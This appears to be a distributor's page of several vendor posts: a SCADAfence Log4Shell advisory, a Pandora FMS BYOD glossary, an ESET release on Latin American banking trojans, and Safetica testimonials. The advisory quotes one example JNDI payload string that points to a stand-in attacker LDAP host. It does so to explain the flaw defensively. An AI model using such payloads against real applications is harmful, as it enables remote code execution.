Along with the rest of the cybersecurity community, we have been continuously monitoring for any evidence of Log4Shell exploit attempts in our digital environment. So far, we have found no evidence that TOPIA or any of our systems have been affected by CVE-2021-44228 or CVE-2021-45046. It is also our current understanding that we are not vulnerable to either CVEs according to data gathered from extensive testing.
December 10, 2021, will always be remembered by the security community as the day when a highly critical zero‑day vulnerability was found in the very popular logging library for Java applications, log4j and identified as CVE-2021-44228. Not long after identified the name “Log4Shell” was coined for the exploit and every organization, no matter their size, including every security vendor, quickly rushed to mitigate the zero-day vulnerability within their applications. This patching marathon is still a work in process as we speak.
Log4Shell is a critical vulnerability that requires urgent action. We can’t stress enough how important this Log4Shell vulnerability is. It’s a critical security vulnerability with a CVSS score of 10 that allows attackers to execute code remotely in any vulnerable environment.If you have not mitigated the Log4Shell vulnerability, we strongly recommend upgrading to the latest v2 version of Log4j which includes the recent vulnerability fix. You can find the mitigation process in Apache’s official Migration from Log4j v1 document. If you are unable to upgrade to the latest version, our research team recommends disabling JMSAppender or blocking any user input from reaching its configuration.
How the Log4Shell Vulnerability Works
The Log4Shell vulnerability targets the parts of Log4j that parse and log user-controlled data. Log4Shell allows attackers to exploit and compromise vulnerable applications. The vulnerability takes advantage of Log4j’s ability to use JNDI, the Java Naming and Directory Interface. By using JNDI lookups, an attacker can force the vulnerable application to connect to an attacker-controlled LDAP (Lightweight Directory Access Protocol) server and issue a malicious payload. Here is a visual diagram of the attack chain from the Swiss Government Computer Emergency Response Team.
To exploit a vulnerable target, attackers must trick the application code into writing a log entry that includes a string such as ${jndi:ldap://evil.xa/x}. Many applications logging is essential and a lot of different information is logged about every incoming request. While the vulnerability is affecting many attack vectors, until mitigation steps and the patch is complete no application or attack vector is safe from Log4Shell.
ICS/OT industry Response to Log4Shell
When the exploitation was first reported the ICS/OT industry didn’t think they were affected but now the ICS manufacturers are rushing to respond to Log4Shell.
Siemens confirmed that 17 of its products were affected by CVE-2021-44228 and that they have started to release patches and provide mitigation advice. Products confirmed to be affected include E-Car OC, EnergyIP, Geolus, Industrial Edge Management, Logo! Soft Comfort, Mendix, MindSphere, Operation Scheduler, Siguard DSA, Simatic WinCC, SiPass, Siveillance, Solid Edge, and Spectrum Power.
Additionally, Schneider Electric also released an advisory, but they announced they are still understanding which of their products are affected. Inductive Automation, which provides SCADA software and industrial automation solutions, announced that it conducted a full audit and determined that its products are not impacted.
While OT/ICS vendors are responding to Log4Shell and publishing advisories, this is not enough to ensure that OT environments and devices are secure against the Log4Shell vulnerability. Now that OT networks are becoming increasingly connected, the attack surface is widening, and increased risk is likely. But unlike in IT, OT environments have much more at stake. To ensure this vulnerability won’t cause more harm than needed, organizations should look into network segmentation in their OT environments. This will decrease the chance that their OT devices and networks will be exploited via the Log4Shell vulnerability.
Too often, OT devices are outdated and don’t offer the latest version or upgrade which allows attackers to easily exploit an OT environment. In the case that OT vendors provide the latest patch or upgrade, organizations need to upgrade their OT technology. However, sometimes OT teams won’t update their technology with the secure version due to their approach of “don’t fix what’s not broken”. This outdated and passive approach can result in the organization’s OT infrastructure becoming an easy target for attackers.
SCADAfence’s OT Security is Here to Help
First of all, at SCADAfence we are here to assure you that all our products, The SCADAfence Platform for OT Security, the Governance Platform, and the Multi-Site Platform are updated and secure from the Log4Shell vulnerability. We remediated the Log4Shell vulnerability in our deployed application services’ code. Customers do not need to take action for any of our hosted web solutions.
On top of ensuring that our products are secure, SCADAfence’s researchers analyzed the vulnerability and now the SCADAfence Platform detects and alerts if an OT asset is vulnerable with the Log4Shell zero-day vulnerability. SCADAfence customers can leverage our OT security threat intelligence service to ensure they can patch and mitigate this exploit in any of their OT devices.
On top of offering OT security threat intelligence, SCADAfence enables organizations to increase their visibility into their entire network as it’s difficult to protect what you can not see. Additional recommended practices are to adopt security network monitoring solutions that provide network segmentation and micro-segmentation as this will help organizations prevent similar exploitations moving forward.
Still Patch, Patch, Patch
Patching is still your best bet to combat this vulnerability. If patching isn’t possible, implementing mitigation techniques is the next best path to minimize the attack surface. SCADAfence’s research team is monitoring the evolution of this vulnerability and will provide additional information and support as needed.
If your organization is looking into securing its industrial networks, the OT & IoT cyber security experts at SCADAfence are seasoned veterans in this space and can show you how it’s done.
To learn more about SCADAfence’s array of OT & IoT security products, and to see short product demos, click here: https://l.scadafence.com/demo
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About SCADAfence
SCADAfence helps companies with large-scale operational technology (OT) networks embrace the benefits of industrial IoT by reducing cyber risks and mitigating operational threats. Our non-intrusive platform provides full coverage of large-scale networks, offering best-in-class detection accuracy, asset discovery and user experience. The platform seamlessly integrates OT security within existing security operations, bridging the IT/OT convergence gap. SCADAfence secures OT networks in manufacturing, building management and critical infrastructure industries. We deliver security and visibility for some of world’s most complex OT networks, including Europe’s largest manufacturing facility. With SCADAfence, companies can operate securely, reliably and efficiently as they go through the digital transformation journey.
We apologize in advance for this extremely freaky reference: If in the well-known science fiction saga Foundation there was a duty to collect all the information of the galaxy to save it, at Pandora FMS we have assigned ourselves the task of making a glossary worthy enough with all the “What are” and the “What is” of technology. And today, without further delay or freakiness, it’s time to define the acronyms: BYOD, BYOA, BYOT.
* Warning to (very) lost sailors: This “Byo-” has NOTHING to do with that other prefix element, “Bio”. Thank you. Get back to your beloved diet
That means indeed: “Bring your own tech from home, kid”. This is what BYOT means. A policy that allows employees to bring their own electronic devices, personal ones, from home to work.
This has advantages even if you don’t imagine it. And the top companies each give their distinctive approach to implementing such a policy. Some offer employees remuneration to purchase such technology. Other companies think better of it and expect their employees to put up with half or all of the expenses. Some even spend the money but then they demand for employees to pay for some services separately, such as phone service or data…
In any case, no matter how you buy your new devices or whoever pays for the Internet that month, if the device is connected to a corporate network, a highly professional IT department must secure and manage the device.
Correct. You have translated well: “Use your own device from home, kid”. This term refers again, although on a different scale, to the tendency of employees to use personal devices to work and connect to their company’s networks, access their systems or relevant data. You know what we mean when we talk about “personal devices”… your smartphone, your laptop, your tablet or, I don’t know, your 4-gigabyte USB.
The truth is that this rings a bell, companies, and especially since this terrible pandemic, now support teleworking. BYOD is here, more and more, working from home, maintaining a flexible schedule, including trips and urgent departures, in the middle of the morning, to get a Coke or to pick up your kid from school.
As it could not be otherwise, for the directives of your company the security of your BYOD is a crucial issue. Because for you it can be a whole morale boost, even on productivity, the fact of working with your trustworthy device, but if the IT department does not take care of checking it before, the access of your personal devices to the company network can raise serious security concerns.
The best thing in this case is to establish a policy where it is decided whether the IT department is going to protect personal devices and, if so, how it is going to determine the access levels. Approving types of devices, defining security policies and data ownership, calculating the levels of IT support granted to BYOD… Then informing and educating employees on how to use their devices without ultimately compromising company data or networks. Those would be the steps to follow.
Studies show that there is higher productivity for employees using BYOD. Nothing less than a 16% increase in productivity in a normal workweek, for those who work forty hours. It also increases job satisfaction and the fact that new hires decide to stay through a flexible work arrangement. Employee efficiency is higher due to the comfort and confidence they have in their own devices. Technologies are integrated without the need to spend on new hardware, software licenses or device maintenance…
Everything looks wonderful, although there are also certain disadvantages as usual. Data breaches are more likely due to theft or loss of personal devices, as well as employee dismissal or departure. Mismanagement of firewalls or antivirus on devices by employees. Increased IT costs, and possible Internet failures.
And what’s that? BYOA is basically the tendency of employees to use third-party applications and Cloud services at work.
As we know, mobile devices, owned by employees, have personal-use applications installed. However, they access these applications and different services through the corporate network. Well, this is the aforementioned BYOA.
There are benefits, of course. All those who may be listening to Spotify or using your own Google Drive without paying directly for the Internet. However, the higher the BYOA, like the higher BYOD and BYOT, the bigger the security holes in your organization. No one suffers more than a company’s IT department when it comes to thinking about how vulnerable corporate data can be. Especially when they are stored in the Cloud.
BYOT, BYOD, BYOA solutions are very efficient in the way an employee works. High morals, high practicity, and high productivity. However, well, they do pose certain cracks in the corporate network. Sensitive data and unsupported/unsecured personal devices, sometimes are not the best combination.
“BYO” products have advantages but they need a seasoned, conscious, proactive IT department, always protected by management policies of BYOT, BYOD, BYOA.
If you have to monitor more than 100 devices, you may also enjoy a FREE 30-day Pandora FMS Enterprise TRIAL. Installation in Cloud or On-Premise, you choose !! Get it here.
Last but not least, remember that if you have a reduced number of devices to monitor, you can use the Pandora FMS OpenSource version. Find more information here.
Do not hesitate to send us your questions. Pandora FMS team will be happy to help you!
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About PandoraFMS
Pandora FMS is a flexible monitoring system, capable of monitoring devices, infrastructures, applications, services and business processes.
Of course, one of the things that Pandora FMS can control is the hard disks of your computers.
BRATISLAVA, PRAGUE — December 15, 2021 — ESET Research is concluding today its blogpost series dedicated to demystifying Latin American banking trojans started in August 2019. Since then, it has covered the most active ones, namely Amavaldo, Casbaneiro,Mispadu, Guildma, Grandoreiro, Mekotio, Vadokrist, Ousaban and Numando. Latin American banking trojans share a lot of common characteristics and behavior. Altogether, ESET has identified a dozen different malware families, most of which remain active to this day. The most significant discovery during the course of this investigation is the expansion of Mekotio and Grandoreiro to Europe, mainly Spain. ESET researchers have also observed occasional small campaigns targeting Italy, France and Belgium. Since Latin American banking trojans expanded to Europe, they have been getting more attention from both researchers and police forces. In the last few months, ESET has seen some of their biggest campaigns to date.
ESET telemetry shows a surprisingly large increase in the reach of Ousaban, Grandoreiro and Casbaneiro in recent months, leading to the conclusion that the threat actors behind these malware families are determined to continue their nefarious actions against users in targeted countries.
The campaigns we see always come in waves and more than 90% of them are distributed through spam, usually leading to a ZIP archive or an MSI installer. One campaign usually lasts for a week at most.
“Brazil is still the most targeted country, followed by Spain and Mexico. Since 2020, Grandoreiro and Mekotio expanded to Europe – mainly Spain. What started as several minor campaigns, likely to test the new territory, evolved into something much bigger. In fact, in August and September 2021, Grandoreiro launched its largest campaign so far and it targeted Spain,” says ESET researcher Jakub Souček, who leads the investigation into Latin American banking trojans.
In June this year, Spanish law enforcement arrested 16 people related to Mekotio and Grandoreiro. In the report, police state that almost €300,000 were stolen and they were able to block the transfer of a total of €3.5 million. Correlating this arrest with Latin American banking trojan activity in Spain, Mekotio seems to have taken a much larger hit than Grandoreiro, leading ESET to believe that the arrested people were more connected to Mekotio. Even though Mekotio went very quiet for almost two months after the arrest, ESET continues to see new campaigns distributing Mekotio.
Latin American banking trojans used to change rapidly. In the early days of ESET’s tracking, some of them were adding to or modifying their core features even several times a month. Nowadays they still change very often, but the core seems to remain mostly untouched. Due to the partially stabilized development, we believe the operators are now focusing on improving distribution.
“Latin American banking trojans require a lot of conditions to attack successfully,” explains Souček. “Potential victims need to follow steps required to install the malware on their machines; they need to visit a targeted website and log into their accounts. On the other side, operators need to react to this situation by manually commanding the malware to display the fake pop-up window and take control of the victim’s machine.”
During the course of this research series, several Latin American banking trojans became inactive, namely, Krachulka, Lokorrito and Zumanek. ESET researchers also discovered Janeleiro, a new Latin American banking trojan. In the future, ESET expects we may see some of these banking trojans expanding to the Android platform.
For more technical details about these Latin American banking trojans, read the blogpost “The dirty dozen of Latin America: From Amavaldo to Zumanek” on WeLiveSecurity. Make sure to follow ESET Research on Twitter for the latest news from ESET Research.
Top three countries most affected by Latin American banking trojans
Latin American banking trojan activity worldwide
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About ESET
For 30 years, ESET® has been developing industry-leading IT security software and services for businesses and consumers worldwide. With solutions ranging from endpoint security to encryption and two-factor authentication, ESET’s high-performing, easy-to-use products give individuals and businesses the peace of mind to enjoy the full potential of their technology. ESET unobtrusively protects and monitors 24/7, updating defenses in real time to keep users safe and businesses running without interruption. Evolving threats require an evolving IT security company. Backed by R&D facilities worldwide, ESET became the first IT security company to earn 100 Virus Bulletin VB100 awards, identifying every single “in-the-wild” malware without interruption since 2003.
Our partners are in everyday contact with customers and provide us with crucial feedback from different industries, geographies, and use cases.
At Secure & IT, we work with Safetica DLP with UEBA (User and Entity Behavior Analytics). This tool allows the information to be classified automatically, assigning labels to each type of data. Thanks to this, it is possible to create reports on the type of information handled by each employee, controlling all the actions and documents with confidential information. This tool provides us visibility, traceability, and forensic analysis on the actions performed by users.
Francisco Valencia
Managing Director, Secure & IT
Protecting our customers from information leaks and insider threats is critical nowadays. With Safetica’s solutions, we can identify and classify information handled by employees, provide complete visibility into user activity, and block information leaks reliably and straightforwardly.
In our first project with Safetica Discovery at a major insurance company in Andorra, we have been able to monitor employee activity, having complete visibility from a security and productivity point of view. It allows us to establish analytical reports, and we ensure regulatory compliance at the audit and security level.
François Ruiz
CEO, Andorsoft
Easy to install and manage, it has fantastical features that allow you to prevent data loss by monitoring everything from printouts, USB accesses, to use behaviour and much more. What about Safetica’s support and people… simply spectacular! Professional and always ready to support us.
Katia Rovezzi
Product Account Manager, ICOS
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About Safetica
Safetica is to provide small and mid-sized companies with the same quality data protection that corporations have – affordably, and without any additional IT administration or disruptions in operation.
Click one of our contacts below to chat on WhatsApp
